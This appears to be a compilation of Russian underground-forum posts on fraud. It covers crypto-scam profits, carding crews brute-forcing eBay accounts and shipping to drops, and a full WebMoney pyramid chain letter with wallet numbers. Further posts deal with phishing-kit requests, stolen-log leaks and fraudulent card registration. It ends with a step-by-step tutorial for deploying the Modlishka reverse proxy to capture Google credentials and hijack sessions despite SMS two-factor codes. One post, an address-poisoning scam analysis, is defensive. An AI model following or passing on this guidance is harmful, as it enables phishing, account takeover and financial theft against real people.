И для интереса остался в сессии и еще отвечал тем, кто писал
Сообщений сотни было, все были в шоке что я(ну не я, а он) им отвечал, все
кинулись помогать проекту, но, к сожалению, это наверное больше подошло бы не
под криптотематику, а под сборы на палку к примеру. Ибо подавляющее
большинство не разбиралось в криптовалюте, а то и не имели представления что
это такое. Так что, тут тоже дело такое, нужно подходить основательно и
грамотно выбирать аудиторию.
Профит: 2k$
Этими примерами я хотел донести мысль, что не стоит зацикливаться только на
фейк-минтах при использовании данного скрипта. Этот скрипт подойдет под разные
цели: точечная работа, под аудиторию или под целое сообщество. Можно придумать
что угодно, главное творчески подходить к этому и можно не имея ничего
заработать уже какой никакой капитал.
А если имеется капитал, то можно открывать огромные проекты, проливать их
через ФБ и Гугл АДС, набирать огромный траффик и соответственно прибыль, но
тут тоже стоит быть аккуратным, ибо не на все проекты ведутся.**
На этом всё, это пособие было для новичков, которые только начинают своё
ремесло в этом деле.
Большое спасибо за внимание! Удачи в делах.
p.s: люблю я конечно затягивать до последнего момента, пойду лило и стича смотреть
[CLIKE]
](https://anonfile.com/r0Z7N1l1oe/32_phishings_sites_zip)
anonfile.com
[/CLIKE]
Всем привет ребят, нужен фишинговый сайт для сбора СС.
может у кого есть какие-то заготовки, или готовые сайты
Спасибо)
Всем привет,в этой теме буду сливать облака,которые попадали мне в руки с
материалом с разным гео и датой логов.
Просьба не писать что по ссылкам - я выкачивать не буду,что бы пробить для
вас гео или даты,довольствуйтесь что есть там.
**Так же запускаем строго на виртуалке,на основе юзать не рекомендовал бы.
Приступим?**
Хайд 3 симпатии и регистрация на форуме(ставить его еще не умею,если что то не так,сообщите,постараюсь поправить).
You must have at least 3 reaction(s) to view the content.
You must have at least 3 reaction(s) to view the content.
Интересует стоимость написания/покупки скриптов для этого , раскрутки (ну это бы я на себя взял: спам) , возможные первоночальные затраты на содержание , постоянный капитал так сказать казны и прочее все пишем тут , что нужно для того чтобы поднять интернет заведение ))
Ну и все проблемы , может кто опытом поделится ! И послденее сколько казино средней руки поднимает в день . Еще есть ли возможность сделать казино преимущественно для кардеров - чтоб в покер бабули с карт проигрывали и на вм/еголд переправлять им его) и сколько такое будет поднимать в день )
Реальный текст, который был повешенн на http://forum.drweb.ru/
Читая это, Вы можете изменить свою жизнь!!!!!!! Это изменило мою жизнь.......
Я наткнулся на это на одном форуме и решил попробовать. Бродя как обычно по разного рода форумам, я нахожу эту статью, в которой говорится, что можно сделать тысячи долларов за пару недель при вложении всего 6$!!!Ну да....подумал я, это должно быть очередной фишкой для лохов, но решил всё- таки дочитать и узнать, что нам за Гербалайф предлагают.......Дальше там говорилось, что надо послать по 1$ на 6 WMZ кошельков, которые ниже перечислены.
Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх, тем самым шестая освобождается, куда Вы вписываете номер своего WMZ кошелька и закидываете данное, с Вами на шестой строчке, сообщение на как минимум 200 разных форумов.
Никаких уловок........Ну я поразмышлял и подумал, что ничего не теряю, кроме этих 6$,которые я отправлю на ниже перечисленные кошельки.......... и решил попробовать......... И угадайте что!!!!!!!!!!!!!!!!!!!!!!!!!!
За 7 дней на мой кошелёк стали приходить
деньги!!!!!!!.............Я был в шоке!!!!! Но сразу подумал, что на этом всё и закончится.........
Но не тут то было!!!!!!!!!!!!!!!!!! В первую неделю я сделал 25$,дальше к концу второй недели уже больше 1000$..............К середине 3-ей недели
10000$.......!!!!!!!!!!!!!!!!!Уже 4-ая неделя и я насчитал 42000$ и эта сумма растёт очень быстро!!!!!!!!!!!!!! И это всё только за цену в 6$!!!!!!!!!!!!!!!!Я был в очень плохом экономическом положении до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света!!!!!!!!!!!!!!.............
А теперь я расскажу Вам, как это работает и, самое главное, ПОЧЕМУ!!!!!!!!!!!!!!................
Я Вам обещаю, что если Вы будете в точности соблюдать ниже перечисленные инструкции, то Вы начнёте получать намного больше денег, чем Вы думали, не прилагая к этому особых усилий!!!!!!!!!
ПРЕДЛОЖЕНИЕ...........:ПРОЧТИТЕ ЭТО ПАРУРАЗ!!!!!!! Следуйте инструкциям, и деньги начнут поступать на Ваш кошелёк!!!!!!!!! Согласитесь, это
просто!!!!! И, ВАЖНО, ничего противозаконного в этом нет!!!!!!!!! ВСЁ ЛЕГАЛЬНО!!!!!!!!!!!!!! И Ваш вклад составляет всего 6$.........ЕЩЁ РАЗ ПОВТОРЮ, ЧТО ЭТО-НЕ ОБМАН, и ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!!!!!!!!!!!!!!!
ЗАМЕТЬТЕ!!!::::: следуйте инструкциям В ТОЧНОСТИ и 50000$ будут Вашими в течение от 20 до 60 дней!!!!!!!!!!!!! ЗАПОМНИТЕ!!!: ВСЁ ЭТО РАБОТАЕТ УДАЧНО ТОЛЬКО БЛАГОДАРЯ ЧЕСТНОСТИ УЧАСТНИКОВ!!!!!!!!!!!Вот те самые 3 шага к успеху:
1. Если у Вас нет тех самых 6 WMZ, то Вам нужно зарегистрироваться в системе WebMoney Transfer, которая находится по адресу http://www.webmoney.ru/.Хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя вариант пополнения кошелька со странички http://www.webmoney.ru/operations.shtm, внесите 6 WMZ(карточки минимум 10 WMZ продаются в обычных ларьках) на Ваш WMZ кошелёк (он начинается с буквы Z).
2. Отправьте на первый номер из ниже перечисленных WMZ кошельков 1$,в
поле напишите:" Пожалуйста внесите меня в список WMZ кошельков". Всё, что Вы сделали - это создали некую услугу и, САМОЕ
ГЛАВНОЕ, это абсолютно легально!!! Вы просите законный сервис, за который платите. Отправьте во 2,3,4,5,6 WMZ кошельки также по 1$,но уже в поле ничего писать не нужно! Вот наконец и список этих кошельков:1.Z23210361
2.Z55359375
3.z12505662
4.Z49964298
5.z37412110
6.Z65513099Теперь ВНИМАНИЕ!!! Я здесь сначала сделал ошибку, от которой хочу Вас уберечь!!!!!: вычеркните из этого списка ПЕРВЫЙ кошелёк и переместите
2-ой кошелёк на место 1-го,который Вы стёрли,3-ий-на место 2-го,4-ый-на место 3-го,5-ый-на место 4-го и 6-ой-на место 5-го!А в шестой номер, который
оказался пустым, ВПИШИТЕ НОМЕР Вашего WMZ КОШЕЛЬКА!!!!!!!!!!Делайте в моей статье, какие угодно Вам изменения, но только сохраните ГЛАВНУЮ
ИДЕЮ!!!(Все изменения можно сделать с помощью БЛОКНОТА, куда Вы скопируете мою статью)!!!И ТЕПЕРЬ САМОЕ ГЛАВНОЕ!!!!!!!!!!: РАЗМЕСТИТЕ ЭТУ СТАТЬЮ НА НЕ МЕНЕЕ ЧЕМ 200 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ(News Groups)!!!!!ЗАПОМНИТЕ, что чем больше Вы разместите, тем выше будет ВАШ доход и этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС И ТОЛЬКО ОТ ВАС!!!!!!!
Этот бизнес продолжает существовать и процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЁЗНОСТИ УЧАСТНИКОВ!!! Итак, когда Вы достигнете 1-ой позиции, Вы будете иметь тысячи долларов просто как создатель списка или статьи, как Вам больше
нравится!!!!!!! Это стоит 6$ и совсем пустяковой работы!!!!!!!!!!!! Займитесь этим сейчас, не откладывая на завтра......!!!!!!!!!!!ВРЕМЯ-ДЕНЬГИ!!!!!!!!!!! !!!
А теперь я Вам расскажу, почему Вы в любом случае ничего не теряете, а только выигрываете!!!!!!!
Скажем, из 200 размещений я получу только 5 ответов (очень-очень маленькая и низкая цифра)!!!
Значит, я получу 5$ находясь на 6-ой позиции в списке!!! Теперь эти 5 людей делают по 200 размещений каждый МИНИМУМ с моим кошельком на 5-ой позиции, и только 5 людей отвечают тем первым пяти - это уже 25$!!!!!!!!!!Дальше эти 25 людей делают по 200 размещений с моим кошельком уже на 4-ой строчке(потому что вписывают свои) и только 5 отвечают - мой доход-125$!!!!!!!Теперь эти 125 людей разместив и получив только 5 ответов дают мне 625$ прибыли (я - на 3-ей строчке)!!!!!!!!!!!!! Дальше смешнее: эти 625 людей делают по МИНИМУМ 200 размещений со мною на 2-ой строчке и только 5 людей отвечают - это
уже 3125$!!!!!!!!!!!Ну а самое интересное - Это то, что эти 3125 человек делают по 200 размещений каждый со мною уже на 1-ой строчке и им отвечают опять только 5 людей, то мой доход-15625$!!!!!!!!!!!Не такая ли внушительная цифра??!!!!! И это всё за первоначальный вклад в 6$!!!!!!!!Когда Вас в списке уже нет, Вы просто высылаете опять 6$ в те же кошельки, что и в первый раз(для этого сохраните эту статью в БЛОКНОТЕ) и опять, переместив номера
кошельков, удалив первый, ставите свой номер на 6-ую позицию и опять размещаете!!!!!!!!!! Вы себе можете представить, что 1000 людей со всего мира
присоединяются к Интернету и читают эти статьи каждый день!!!!!!!!!!!!!!Точно так же, как и Вы сейчас читаете эту!!!!!!!!!!! Ну так что??
А если Вы всё сделаете так, как я описал выше, ЭТО
БУДЕТ РАБОТАТЬ, КЛЯНУСЬ ВАМ!!!!!!!!!!!!!!!!НУ И ЧТО??
Каждый день в Интернете появляются от 20000 до 50000 тысяч новых пользователей!!!!!!!!!! По прогнозам специалистов, только к 2006 году количество пользователей Интернетом увеличится с нынешних 9 миллионов человек, до 21 миллиона!!!!!!!!!!!!!!!! Какие шансы, что они захотят попробовать себя в чём-то новом? Только запомните:
ЧЕСТНОСТЬ И ТОЛЬКО ЧЕСТНОСТЬ ЛЮДЕЙ позволяет процветать этому бизнесу!!!!!!!!!!!!!!!!Ну и последнее.......:Это действительно великая аксиома - чтобы получить что - то, надо дать что - то!!!!!!!!!!!!!! А чтобы получить ещё больше , надо дать ещё больше!!!!!!!!!!!
Убедитесь в этом Сами..........
УДАЧИ ВСЕМ!!!!!!!!!!!!!!!!!
Click to expand...
устарело
Эх привет ребята. Давно я не пилил, что-либо интересного, и решил я, а запилю- ка я тему, как я в далеком 2018 году создавал кардинг проект.
Внимание! Статья не из цикла "скопируй сделай", автор статьи упражняет ваш мозг новыми идеями, на базе своих состоявшихся, и кто с умом не моржа с синдромом дцп, тот допилит под себя любую тему, и даже эту!
Итак поехали!
Шел 2018 год, трудные времена.
Пижу, не трудные, всегда можно найти выход с любой ситуации.
Итак.
Начало расцвета брута ебей на дворе,это было модно, это было в топе и тренде,
на фоне этого был закуплен софт брут под ебей ( а точнее несколько), слиты
базы мыло пасс, и я сидел брутил, и потом вбивал, брутил, вбивал, брутил....
Эх время, аж слеза по моему скудному скам фейсу прошла.
Крч, была тема, берем базы мыло пасс, вгоняем в брут ебей, на выходе получаем
брученые гуды, с привязкой сс либо пп.
Так как автор этой статьи, априори ленивая жопа, был создан план. А именно.
Установлен телеграм, парсинг групп кардинг хуярдинг, ебей, палка, вбивотроны.
Самая адекватная аудитория ( более менее, потом поймете о чем я), была выбрана
на этот приват, и приглашена к общению через личку в телеге.
Самые сливки кардинга, самые смелые, отчаянные и просто хорошие ребята, были
собраны для одной единственной миссии и цели!!!
Миссия века, а точнее года - Заработать бабки автору статьи, ну и канешно же себе монету ( ибо новичкам нужно помогать, и любая помощь вернеться в тройне).
Итак. Зная какая аудитория передо мной, чародеи маги, выпускники школы ввх, лекторы, практики черной магии кардинга, я решил, дабы не проебать свой бизнес, посажу каждого отдельного работника на отдельный VPS ( поже поймете почему).
На каждый впс была установлена лихуца брут ебея, а так же ( в силу небогатой жизни работников и лишней копеейки), были куплены аки на люксах.
Итак имеем. 5 впс, на каждому 5 софтов, и 5 аков люксов, перед работой я заходил на впс ( до этого я подправил их, сделал запрет на установку и запуск любого софта, кроме брута, и браузера, так же дал запрет на сейв любого файла, кроме системного расширительного, и временных файлов браузера, это сделано было на тот случай, если найдеться какой-то хитрожопый антон, захотевший пиздануть ак от люксов, через кейлогер либо стилак, либо завладеть впс).
Была создана группа в тг, где каждый работник, появлявшийся в онлайне, давал мне ответ - я здесь готов ебошить!
![](/proxy.php?image=https%3A%2F%2Fwww.meme- arsenal.com%2Fmemes%2F02cc25ef5159da70b604eef9a72d489f.jpg&hash=f75d6b792f1ac7f59971121e1af007cc)
И каждый день, я заходил на впс, врубал софт, через свои ключи ( чтобы не было видно ключ), и так же заходил на аки люксов, вливал чуток монету, и сейвил сессию, но НИКОГДА, запомните, никогда не давайте данные сервисов, людям, которые пачками будут у вас работать, пропадать, морозиться, ныть, и прочее гавно.
Всегда будьте умнее, хитрее, всегда будьте босом в любой ситуации, даже если она непонятная.
Название софтов, я рекламить не буду, кому надо можете прогуглить, а кто пользовался ими, сами по скринам поймут.
Как выглядела работа на каждой впс.
еще так, кто проявил себя мегатрон вбиватором, брался работать 24 часа в сутки, только, шоб давало, и приносило профит.
Вообщем работа пошла, кто-то тупил, кто-то ныл, а кто-то просто поработав пару дней, поняли, что кардинг это не для них, и мама говорила правду, что учись сынок на пятерки, будешь ездить на шестерке.
Попадались и умные ребята, кому то нужно было разжевать немного, и они
тронулись с места.
Для нормальных ребят, кто не первый месяц работал на меня, и я видел их
стремление, я удаленно настроил мобилы и планшы на базе андроид, чтобы они
клепали с мобил ( с апк приложения ебей давало тогда ой как хорошо, и нихуя не
слетало, ну смотря как настроить ведро).
А вот и первые результаты после старта проекта и получения первых треков.
Если аки были юса, делался щип на КХ и последующий рероут, либо сразу на
дропа.
Если ак еу, пробовалося клепать сразу на снг дропов, и притом удачно с еу
давало, хотя и немного при чекауте давало, но мы брали количеством.
А вот уже работа кипела у моих ребята, через 3 месяца набивки руки, проебаных ночей, слез, и нервов, кто-то набил руку вот так.
Вообщем, с ребятами мы работали до осени, было перебрано по собеседованию куча народу, все хотели и рыбку сьесть и на качан присесть, но никто не хотел ебошить, как это диктовали суровые реалии работы с ебеем.
Кто-то хитрожопый, набив руку, пошел сам работать, сам на себя, кто-то просто ушел с темы, подняв монету, и забив на ебей, начал работать с палкой, а кто-то подучив мат часть, освоив все А и Я, пошел далее, и иногда я беру этих ребят, и прошу, сделать ту или иную работу, либо протестировать за меня, ну так, без обязательств, без напора, без напряга, и не давя на людей, и они как мои хорошие знакомые, с которыми мы нормально так подняли монету, всегда приходят на помощь, и готовы к работе. Ведь мы теперь коллеги, и просто хорошие знакомые, которые без б, прийдут на помощь.
Ну вот и подходит эта замечательная история к концу.
Работа в 2018 году была проведена колосальная, как я уже говорил выше, 80% разбежалось кто куда, 20% всегда на связи, но ебей вспоминают со слезами, и готовы так же работать, но уже по другим проектам.
Софты, аки люксов валяются без дела ( хотя я их давно окупил с первых треков).
Вообщем подводя итоги, че могу сказать?
Да ничего говорить я и не буду. Каждый почерпнет инфу, что я запилил, найдутся
и сектанты какого-то гавно ввх, которые скажут в топе "ах ты ж хуило, кококо
кукуку", и прочая лабута.
Я скажу таким людям! Если вы не прошли у меня тогда еще, в далеком 2018 году,
собеседование, то нехер сейчас гавнить в моем топе, идите на завод.
Ну а кому понравилось это повествование, желаю фарту, прибыльных тем, и всегда держите свой мозг в тонусе.
С вами был Кверти.
Всем Мир.
Придумал лотерею. Смысл такой: тебе платят 1WMZ на вэбмани ты отсылаешь 100WMZ тому кто заплатил НО с протекцией сделки. Опытным путем было установлено что на угадывание кода протекции дается 7 попыток. Тоесть шансы угадать 5-значный код равны: 90000/7 => 1 к 12850 => ничтожно малы. Хотя думаю что многа народу клюнут. Кто че думает по этому поводу?
Как по мне, так мне часто бывает удобней накидать\скачать фейк и завести туда
жертву нежели засылать троя или атаковать машину жертвы. Либо же просто
выудить пароль в непосредственном общении с жертвой!
А что вы думаете по этому поводу? Прошу дать обоснованный ответ
В этой теме будем писать все новости фишинга в сети.
Вот одна из последних:
Фишинг в PayPal
Злоумышленники использовали XSS уязвимость для похищения номеров кредитных
карт и другой личной информации пользователей PayPal, сообщает netcraft.com.
Обман работал весьма убедительно; люди посылались на URL, находящийся на
подлинном сайте PayPal. Ссылка работала по SSL протоколу и использовала
реальный 256-битный SSL сертификат, что не вызывало сомнений в его
принадлежности к PayPal. Однако, часть этой страницы была изменена засчет XSS
уязвимости, так что когда жертва попадала на нее, видела сообщение: "Your
account is currently disabled because we think it has been accessed by a third
party. You will now be redirected to Resolution Center." ("Ваш счет в
настоящее время заблокирован, поскольку мы думаем, что к нему получил доступ
кто-то постороний. Вы будете перемещены в Resolution Center"). После чего
пользователь перенаправлялся на постороний сервер, где он вводил свой логин и
пароль, которые успешно попадали в руки фишеров.
...все написаное мной ранее - бред... :crazy:
...вы - ничего здесь не видели... :fuck:
...не верь,не бойся, не проси... :bang:
...вся наша жизнь - фишинг...
ease:
P.S.
...в аттаче убрать с конца .txt
...прошу прощения у администрации за flood... :pioneer:
A-Z Everything about FRAUD with tools, samples, templates, tutorials and more...
4 Mega Links in total of 17.22 GB + 35.78 GB +35.79 GB + 7,2 MB = 88,797 GB
Contents:
koononte fraud bible (2020)
FRAUD BIBLE 2020 UPDATED
2019 FRD BIBLE
goonezys bible
You must have at least 3 reaction(s) to view the content.
Don't forget to react and Enjoy!
Всех приветствую. Создал тему для обсуждения кредитных саморегов, трансфер
балансов и выпуск виртуальных кредиток. Если кто-то поделиться более менее
рабочими вариантами, не говорю о привате, буду признателен. Собственно от себя
скажу, амекс под прием регать сейчас без вариантов, потому что отправляют
usps'ом(без трэка). Вцц амекса и сити, никто не налит, то ли сам банк
деклайнит, то ли просто никуда не лезет.
P.S. прикреплю файл с сити вцц, экспа заканчивается сегодня(баланс не тронут,
не убита), думаю понятно как она регается, если нет, то оффер через aa.com
P.P.S. ВТ на всякий случай, для скептиков))
analysis/NWY1MjhlOGQzOTU0MjMzMzg0NTRmNTYwZjc4OTFmNDI6MTY4ODAzNzM2Mg==)
VirusTotal
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile- analysis%2FNWY1MjhlOGQzOTU0MjMzMzg0NTRmNTYwZjc4OTFmNDI6MTY4ODAzNzM2Mg%3D%3D%2Fimages%2Ffavicon.png&hash=5358ed5f826961d6751aa82f4c861296&return_error=1) www.virustotal.com
Недавно несколько пользователей сообщили, что их средства были украдены.
Сначала они не знали, как были украдены их средства, но при внимательном
рассмотрении мы обнаружили, что это был новый вид мошенничества с airdrop.
С адресов многих жертв постоянно сбрасывались крошечные суммы токенов (0,01
USDT, 0,001 USDT и т.д.), и, скорее всего, они были выбраны в качестве мишени,
поскольку их адреса были задействованы в дорогостоящих транзакциях и объемах
торговли. Последние несколько цифр адреса злоумышленника практически идентичны
последним нескольким цифрам адреса пользователя. Это делается для того, чтобы
обмануть пользователя и заставить его случайно скопировать неправильный адрес
из истории транзакций и отправить средства на неправильный адрес.
Связанная информация
Адрес злоумышленника 1: TX...dWfKz
Адрес пользователя 1: TW...dWfKz
Адрес атакующего 2: TK...Qw5oH
Адрес пользователя 2: TW...Qw5oH
Анализ MistTrack
Начнем с обзора двух адресов злоумышленников:
Адрес злоумышленника (TX.....dWfKz) и адрес пользователя (TW.....dWfKz) оба
оканчиваются на dWfKz. Даже после того, как пользователь по ошибке отправил
115 193 USDT на неправильный адрес, злоумышленник продолжает отправлять 0,01
USDT и 0,001 USDT на адрес жертвы, используя два новых адреса, которые также
заканчиваются на dWfKz.
То же самое произошло и со второй жертвой. Адрес злоумышленника (TK....
.Qw5oH) и адрес пользователя (TW.... .Qw5oH) оба заканчиваются на Qw5oH.
Жертва по ошибке отправила 345 940 USDT на неправильный адрес, а злоумышленник
продолжает отправлять 0,01 USDT на адрес жертвы, используя новые адреса,
которые также заканчиваются на Qw5oH.
Далее мы рассмотрим адрес злоумышленника 1 с помощью нашей AML-платформы
MistTrack (tx. .dWfKz). Как показано на рисунке ниже, адрес злоумышленника 1
отправляет 0,01 USDT и 0,02 USDT на различные целевые адреса, все из которых
взаимодействовали с адресом, заканчивающимся на dWfKz.
Оглядываясь назад, мы видим, что первоначальные переводы для этих airdrops
были сделаны с адреса TF.... J5Jo8 10 октября, когда на него было переведено
0,5 USDT.
Предварительный анализ TF... .J5Jo8:
Этот адрес отправил 0,5 USDT почти на 3300 адресов, что указывает на то, что
каждый из этих адресов-получателей может быть адресом, используемым
злоумышленником для airdrop. Поэтому мы решили выбрать один адрес наугад,
чтобы проверить нашу теорию.
MistTrack был использован для анализа последнего адреса на приведенном выше
графике, TX.....4yBmC. Как показано на рисунке ниже, адрес TX....4yBmC
используется злоумышленником для рассылки 0,01 USDT на несколько адресов,
которые заканчиваются на 4yBmC.
Рассмотрим адрес атакующего 2 (TK.... .Qw5oH): 0,01 USDT было отправлено по
воздуху на несколько адресов, а начальное финансирование в размере 0,6 USDT
было отправлено с TD.... .psxmk.
Как видно из приведенного ниже графика, злоумышленник отправил 0,06 USDT на
TD.... .kXbFq, а также взаимодействовал с депозитным адресом пользователя FTX,
который заканчивается на Qw5oH.
Поэтому давайте проделаем обратный процесс и посмотрим, взаимодействовали ли
другие адреса с TD... .kXbFq. Есть ли другие адреса с теми же конечными
символами, что и те, которые были переданы им по воздуху?
И снова мы выберем два адреса наугад и проверим нашу теорию. (например, адрес
депозита Kraken TU... .hhcWoT и адрес депозита Binance TM.... .QM7me).
К сожалению, мошеннику удалось обманом заставить ничего не подозревающего
пользователя отправить ему свои средства.
Резюме
Эта статья посвящена тому, как мошенники используют пользователей, которые
копируют адрес из истории транзакций без проверки всего адреса. Для этого они
генерируют похожий адрес, который заканчивается так же, как и адрес
пользователя, и регулярно отправляют небольшие суммы денег на адрес
пользователя. Все это делается в надежде, что пользователи скопируют
поддельный адрес и в следующий раз отправят свои средства мошеннику.
SlowMist хотел бы напомнить всем, что в связи с неизменностью технологии
блокчейн и необратимостью операций на цепочке, пожалуйста, дважды проверьте
адрес, прежде чем действовать. Пользователям также рекомендуется использовать
функцию адресной книги в своем кошельке, чтобы не копировать адрес каждый раз.
(copypast)
Теневые форумы изобилуют предложениями о взломе аккаунтов. В большинстве случаев атаки устраивают при помощи фишинга с подделкой страницы авторизации. Однако такой метод неэффективен, если пользователю приходит SMS с проверочным кодом. Я покажу, как пробить двухфакторную аутентификацию, на примере взлома аккаунта Google редактора «Хакера».
Экскурс в 2FA
Во времена, когда сайты работали по HTTP и о защите толком никто и не думал,
перехватить трафик с учетными данными было совсем несложно. Потом трафик стали
шифровать, и хакерам пришлось придумывать более изощренные способы подмены и
перенаправления маршрутов. Казалось бы, двухфакторная аутентификация
окончательно решила проблему, но все дело в деталях ее реализации.
Метод 2FA (Two-Factor authentication) был придуман как дополнительный способ подтверждения владельца аккаунта. Он основан на нескольких способах аутентификации:
Первый метод еще встречается при восстановлении паролей по контрольным вопросам. Для регулярного использования он не годится, так как ответы не меняются и могут быть легко скомпрометированы. Второй способ чаще применяется для защиты данных на мобильных гаджетах и для авторизации клиентских приложений на серверах.
Самый популярный метод 2FA — третий. Это SMS с проверочными кодами, генерируемыми по технологии [OTP](https://medium.freecodecamp.org/how-time- based-one-time-passwords-work-and-why-you-should-use-them-in-your-app- fdd2b9ed43c3). Код приходит каждый раз разный, поэтому угадать его практически невозможно.
Однако чем сложнее преодолеть защиту техническими методами, тем легче бывает это сделать социальной инженерией. Все настолько уверены в надежности 2FA, что используют ее для самых ответственных операций — от авторизации в Google (а это сразу доступ к почте, диску, контактам и всей хранимой в облаке истории) до систем клиент-банк.
При этом возможность обхода такой системы уже показывал австралийский исследователь Шабхэм Шах (Shubham Shah). Правда, его метод был довольно сложен в практической реализации. В нем использовалась авторизация по звонку, а не SMS, а предварительно нужно было узнать номер телефона жертвы и часть учетных данных. PoC был не особо убедительным, но наметил вектор атаки.
Modlishka
В начале 2019 года польский исследователь Пётр Душиньский (Piotr Duszyński)
выложил в открытом доступе реверс-прокси
Modlishka. По его словам, этот
инструмент может обойти двухфакторную аутентификацию, что мы сейчас и
проверим.
Если сравнить его с тем же [SEToolkit](https://github.com/trustedsec/social- engineer-toolkit) (он встроен практически во все популярные дистрибутивы для пентеста), то разница вот в чем: SET клонирует и размещает на локальном сервере страницу авторизации. Там все основано на работе скриптов, которые перехватывают вводимые учетные данные жертвы. Можно, конечно, настроить редирект на оригинальный сайт, но трафик от жертвы до твоего сервера будет незашифрованным. По сути, такого рода программы выступают в роли web-серверов с поддельным (фишинговым) сайтом.
Modlishka действует иначе. Генерируется свой сертификат, которым шифруется соединение от жертвы до нашего сервера (чтобы не палиться). Затем эта машина выступает в роли обратного прокси.
Другими словами, весь трафик идет на оригинальный сайт с инстанцией на нашем сервере. У хакера остаются учетные данные, и захватывается авторизованная сессия жертвы. Классическая MITM-атака, которую предваряет фишинг (нужно как- то заставить жертву установить поддельный сертификат и направить ее на фейковый сайт).
Статья написана в образовательных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный изложенными здесь материалами.
Поднимаем стенд
Давай поднимем сервер с Modlishka внутри локальной машины. Я сделаю это на
примере Kali Linux, но принципиальной разницы для других дистрибутивов не
будет — разве что слегка изменится путь к исходникам Go.
Вначале ставим Go — на этом языке написан реверс- прокси, и без Go он не скомпилируется.
Code:Copy to clipboard
$ apt-get install golang
Следом указываем путь к директории исходников:
Code:Copy to clipboard
$ export GOPATH='/root/go'
Проверить все можно командой
Code:Copy to clipboard
$ go env
В выводе должен быть указан GOPATH.
Вывод команды
Затем клонируем ветку с инструментом.
Code:Copy to clipboard
$ go get -u github.com/drk1wi/Modlishka
$ cd /root/go/src/github.com/drk1wi/Modlishka/
Создаем сертификат:
Code:Copy to clipboard
$ openssl genrsa -out secret.key 2048
$ openssl req -x509 -new -nodes -key secret.key -sha256 -days 1024 -out cert.pem
Теперь необходимо перенести содержимое ключа и сертификата в файл plugin/autocert.go и заменить значение двух переменных:
Файл autocert.go после замены сертификата
Теперь собираем все это дело:
Code:Copy to clipboard
$ make
Занимает компиляция от трех до десяти минут в зависимости от количества вычислительных ресурсов.
Сам запускаемый файл находится в директории dist/ под названием proxy. Для проверки можно запустить с ключом -h — вывод справки.
Code:Copy to clipboard
$ ./dist/proxy -h
Вывод справки программы Modlishka
Ловим учетные данные и сессию жертвы
Как я писал выше, чтобы создать прозрачный для жертвы шифрованный канал до
нашего реверс-прокси, необходимо сперва экспортировать в браузер сертификат.
Дальнейшие действия разбираются на примере Mozilla Firefox x64 v. 67.0.
Перед запуском взглянем внимательно на содержимое еще одного файла в директории templates. Нам интересен google.com_gsuite.json. Подробное описание каждого пункта можно найти в гайде по этому конфигу.
Содержимое файла google.com_gsuite.json
Есть два варианта запуска Modlishka: вручную и с помощью конфигурационного файла. Для запуска вручную минимальная команда выглядит так:
Code:Copy to clipboard
$ ./dist/proxy -target https://google.com -phishingDomain loopback.modlishka.io -listeningPort 443 -tls
Запуск с использованием конфигурационного файла:
Code:Copy to clipboard
$ ./dist/proxy -config /templates/google.com_gsuite.json
Запустим из конфига и перейдем в браузере по адресу loopback.modlishka.io. Нам откроется страница google.com. Входим в аккаунт и видим, как в выводе терминала появляются учетные данные жертвы.
Логин и пароль в выводе Modlishka
Если перейти по адресу loopback.modlishka.io/SayHello2Modlishka (очень символично), то получим консоль управления перехваченной сессией (в данный момент это бета-функция). На данном этапе мы перехватили логин и пароль жертвы безо всяких ошибок с шифрованием и в «защищенном» соединении. Насколько мне известно, другие инструменты аналогичного назначения такого не умеют.
Что же теперь делать с двухфакторной аутентификацией? А вот что: в панели управления есть незаполненное поле UUID, и эта цифра — ключ ко всему.
Если сразу нажать на кнопку Impersonate user (beta), то откроется пустая вкладка, и в консоли Modlishka нам подскажет, что нет UID пользователя. Его необходимо задать, а задается он в самом начале — указывается в ссылке на наш злой URL. Для этого вернемся к конфигурационному файлу.
Нам интересна строка "trackingParam": "ident". В ней необходимо задать значение ident, чтобы наш URL выглядел следующим образом:
Code:Copy to clipboard
https://loopback.modlishka.io/?ident=1
Именно на такой (или дополнительно обфусцированный) URL необходимо направить жертву.
На этот раз, после перехода и авторизации по такой ссылке, в панели управления (loopback.modlishka.io/SayHello2Modlishka) будет доступна сессия с заполненным UUID. Как именно это выглядит, я покажу чуть позже на реальном примере.
Теперь при нажатии на большую желтую кнопку мы увидим красивую синюю анимацию и через пять-десять секунд попадем в авторизованную сессию жертвы, невзирая на трудности двухфакторной авторизации. Жертва, как обычно, получит и введет подтверждающий код, видя зашифрованное соединение и настоящую панель авторизации Google, но не замечая вклинившегося посередине реверс-прокси Modlishka.
Хоть я и привел Wiki по всем параметрам конфигурационного файла, есть еще один момент. После того как жертва ввела учетные данные, желательно предотвратить выход из аккаунта и сохранить авторизованную сессию. Это делает параметр terminateTriggers. Если в этом параметре указать URL, на который попадет пользователь после успешной авторизации, то при появлении такого адреса весь трафик начнет перенаправляться на оригинальный URL, а авторизованная сессия не будет тронута даже после выхода из аккаунта.
Готовый комплект за NAT
Атаковать внутри одной машины или ЛВС оказалось не так сложно, а вот с
подготовкой в качестве PoC «боевого» стенда в WWW у меня поначалу вышла
заминка. Для него понадобится либо перенаправление на белый (внешний) IP-
адрес, либо выделенный сервер с таким адресом. Арендовать сервер можно от 300
рублей в месяц. Для тестов я брал тут.
INFO
Когда я поднимал этот сервер на Kali Linux, проблем не было. На VDS стояла
Ubuntu Server 16.4, и при установке Golang оказалось, что в указанных по
умолчанию репозиториях лежит очень старая версия Go, которая при компиляции
выдавала массу ошибок. В таком случае необходимо добавить актуальные
репозитории Go и установить свежую версию.
Первая проблема заключается в доменном имени. Если перейти с компьютера жертвы
на URL loopback.modlishka.io, то ничего не выйдет, так как внешние и
неподконтрольные нам DNS не знают такого адреса. Если же перенаправить на IP-
адрес машины с Modlishka, то жертва попадет прямиком на страницу Google, минуя
прокси-сервер, а в выводе терминала увидим две строки:
Code:Copy to clipboard
Host 192.168.1.15 does not contain the phishing domain
Redirecting client to google.com
Если жертва в той же локальной сети, то можно задать соответствие IP — URL в местном DNS или в ее файле hosts. В моем случае это было так:
